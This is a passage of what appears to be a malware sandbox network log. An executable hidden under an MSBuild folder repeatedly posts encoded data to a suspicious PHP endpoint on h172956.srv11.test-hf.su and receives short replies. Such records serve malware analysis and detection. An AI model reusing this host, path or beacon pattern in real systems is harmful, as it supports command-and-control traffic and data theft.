                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 39 38 0d 0a 02 11 2e 1f 31 3b 37 55 34 0a 27 09 2a 3d 2e 5a 2a 22 35 07 28 28 26 05 3d 2f 0c 14 38 07 02 50 3f 01 3c 1b 37 2f 30 1b 22 21 3f 0a 31 39 20 5c 05 11 24 07 27 32 03 59 24 2a 25 13 30 1f 2a 07 25 2f 01 41 28 02 3d 05 24 29 05 10 34 0d 2c 55 31 04 30 07 26 2f 2a 05 39 3e 30 00 31 3d 2d 54 02 17 21 08 24 2d 27 05 3f 0e 33 10 25 22 0b 15 28 2d 0a 56 22 00 38 1e 36 0a 3d 12 26 3b 3d 01 22 1c 02 05 28 5e 27 59 27 3c 30 57 25 2e 23 55 22 00 2c 52 0e 3f 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 98.1;7U4'*=.Z*"5((&=/8P?<7/0"!?19 \$'2Y$*%0*%/A(=$)4,U10&/*9>01=-T!$-'?3%"(-V"86=&;="(^'Y'<0W%.#U",R?\W0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      39192.168.2.44978291.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:15.196578979 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:15.539757967 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:15.540092945 CET2548OUTData Raw: 54 5b 54 59 5b 5f 55 56 5e 57 5a 51 57 5e 50 5c 54 54 54 5d 56 5f 57 5b 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: T[TY[_UV^WZQW^P\TTT]V_W[QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X:8W6S00:3:\/'?1<Q5"3Y'B+Y&<),9%Z"!Q*
                                                                                      Mar 6, 2024 09:53:15.912139893 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:15 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      40192.168.2.44978391.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:16.385281086 CET324OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Mar 6, 2024 09:53:16.728610039 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:16.728928089 CET2548OUTData Raw: 51 59 54 58 5e 5d 50 57 5e 57 5a 51 57 5e 50 5e 54 53 54 5c 56 59 57 5d 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: QYTX^]PW^WZQW^P^TST\VYW]QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9C8109[06/Y-$8/[190"/8"Y0$<X/9%Z"!Q*
                                                                                      Mar 6, 2024 09:53:17.100050926 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:16 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      41192.168.2.44978491.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:17.575922966 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:17.933948040 CET2548OUTData Raw: 54 58 54 5f 5b 5a 55 56 5e 57 5a 51 57 58 50 58 54 54 54 52 56 5f 57 5f 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: TXT_[ZUV^WZQWXPXTTTRV_W_QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9E8120#!$55/?'^$%)3!6<+]'7\%,!8%Z"!Q*-
                                                                                      Mar 6, 2024 09:53:17.936156988 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:18.309480906 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:18 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      42192.168.2.44978591.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:18.778947115 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:19.136964083 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:19.137192965 CET2548OUTData Raw: 54 51 54 5d 5e 5e 50 50 5e 57 5a 51 57 5a 50 5e 54 51 54 5f 56 5a 57 55 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: TQT]^^PP^WZQWZP^TQT_VZWUQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9D;5'&5"8*Y$+&$T"/7#,3\3$,2.89%Z"!Q*%
                                                                                      Mar 6, 2024 09:53:19.510304928 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:19 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      43192.168.2.44978691.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:19.981386900 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:20.327007055 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:20.327337980 CET2548OUTData Raw: 51 5d 51 5b 5e 5e 50 54 5e 57 5a 51 57 5f 50 53 54 50 54 5e 56 58 57 55 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: Q]Q[^^PT^WZQW_PSTPT^VXWUQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9A;2:S00&$*\,?!3('\&9/!Z75?<'7<%Z&\,)%Z"!Q*1
                                                                                      Mar 6, 2024 09:53:20.703233004 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:20 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      44192.168.2.44978791.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:21.174117088 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:21.517261028 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:21.517719030 CET2548OUTData Raw: 51 5e 54 59 5e 5a 55 51 5e 57 5a 51 57 51 50 58 54 54 54 5f 56 5f 57 55 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: Q^TY^ZUQ^WZQWQPXTTT_V_WUQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9.")03!\$5!/&+31_,6/8W!,07^$/>\,%Z"!Q*
                                                                                      Mar 6, 2024 09:53:21.889686108 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:21 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      45192.168.2.44978891.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:21.207469940 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 1872
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:21.552423954 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:21.552689075 CET1872OUTData Raw: 51 5b 54 51 5b 5b 55 55 5e 57 5a 51 57 5d 50 53 54 53 54 5d 56 5f 57 5a 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: Q[TQ[[UU^WZQW]PSTST]V_WZQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9C8W5%3!$%&_8<-&('\%*'!?$U#<?^'4(%,/)%Z"!Q*9
                                                                                      Mar 6, 2024 09:53:21.923326015 CET435INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:21 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 39 38 0d 0a 02 11 2e 5b 32 05 37 50 34 0a 2c 55 2a 04 36 12 3d 21 00 5a 3c 01 36 00 3d 2f 22 5e 2e 29 38 1e 3f 16 20 19 23 11 34 1b 21 31 2f 0b 25 29 20 5c 05 11 24 01 27 31 39 1c 27 29 22 02 26 21 22 07 26 3c 33 40 2b 2b 2e 13 27 17 06 01 23 23 23 0c 26 39 23 5b 33 3f 22 04 2d 00 28 03 25 17 2d 54 02 17 21 0d 30 3e 28 11 29 30 33 5d 25 1c 3d 1a 3e 3e 3f 0c 21 3a 3b 0f 22 55 25 5d 25 06 2e 59 21 1c 09 11 2b 16 3f 1f 33 12 0e 15 27 3e 23 55 22 00 2c 52 0e 3f 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 98.[27P4,U*6=!Z<6=/"^.)8? #4!1/%) \$'19')"&!"&<3@++.'###&9#[3?"-(%-T!0>()03]%=>>?!:;"U%]%.Y!+?3'>#U",R?\W0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      46192.168.2.44978991.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:22.356364012 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:22.699639082 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:22.700398922 CET2548OUTData Raw: 51 5c 54 5e 5b 5c 55 50 5e 57 5a 51 57 51 50 59 54 51 54 53 56 5c 57 5c 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: Q\T^[\UP^WZQWQPYTQTSV\W\QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X:,!$U!^'%&X;%';')#!?+6/_&7(1<,%Z"!Q*
                                                                                      Mar 6, 2024 09:53:23.073484898 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:22 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      47192.168.2.44979091.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:23.545169115 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:23.888211012 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:23.888592958 CET2548OUTData Raw: 54 5f 54 50 5b 56 55 57 5e 57 5a 51 57 5a 50 59 54 57 54 58 56 5e 57 5e 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: T_TP[VUW^WZQWZPYTWTXV^W^QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9E/-$3=\$6*\,<6'+3Z1!?8U"<$/2Z:\89%Z"!Q*%
                                                                                      Mar 6, 2024 09:53:24.264260054 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:24 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      48192.168.2.44979191.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:24.745485067 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:25.090270042 CET2548OUTData Raw: 54 50 51 5d 5e 59 50 53 5e 57 5a 51 57 5b 50 52 54 56 54 5b 56 5b 57 5b 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: TPQ]^YPS^WZQW[PRTVT[V[W[QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X:.!&T0#1$P*8<6Y$&0"Z V5?3^37'^%/%Z"!Q*!
                                                                                      Mar 6, 2024 09:53:25.090532064 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:25.471139908 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:25 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      49192.168.2.44979291.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:25.937764883 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2544
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:26.281550884 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:26.281882048 CET2544OUTData Raw: 54 59 54 51 5e 59 55 50 5e 57 5a 51 57 59 50 59 54 52 54 53 56 5c 57 5a 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: TYTQ^YUP^WZQWYPYTRTSV\WZQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X98W)0#*'5;?08&T!+5(&$/^&9;9%Z"!Q*!
                                                                                      Mar 6, 2024 09:53:26.652324915 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:26 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      50192.168.2.44979491.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:27.248513937 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
